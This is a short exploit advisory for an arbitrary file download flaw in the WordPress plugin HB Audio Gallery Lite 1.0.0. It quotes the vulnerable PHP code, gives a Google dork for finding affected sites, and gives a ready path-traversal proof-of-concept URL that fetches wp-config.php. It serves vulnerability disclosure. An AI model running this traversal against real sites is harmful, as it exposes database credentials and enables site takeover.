WordPress HB Audio Gallery Lite 1.0.0 Arbitrary File Download
Posted on 30 November -0001
<HTML><HEAD><TITLE>WordPress HB Audio Gallery Lite 1.0.0 Arbitrary File Download</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY># Exploit Title: Wordpress Plugin HB Audio Gallery Lite - Arbitrary File Download # Exploit Author: CrashBandicot # Date: 2016-03-22 # Google Dork : inurl:/wp-content/plugins/hb-audio-gallery-lite # Vendor Homepage: https://fr.wordpress.org/plugins/hb-audio-gallery-lite/ # Tested on: MSWin32 # Version: 1.0.0 # Vuln file : gallery/audio-download.php 11. if( $_REQUEST['file_size'] && $_REQUEST['file_path'] ) { 13. $file_size = $_REQUEST['file_size']; 15. $file = $_REQUEST['file_path']; 17. $filename = basename($file); .... 55. Header("Content-Disposition: attachment; filename='" . $filename . "'"); # PoC : /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10 # 22/03/2016 - Informed Vendor about Issue </BODY></HTML>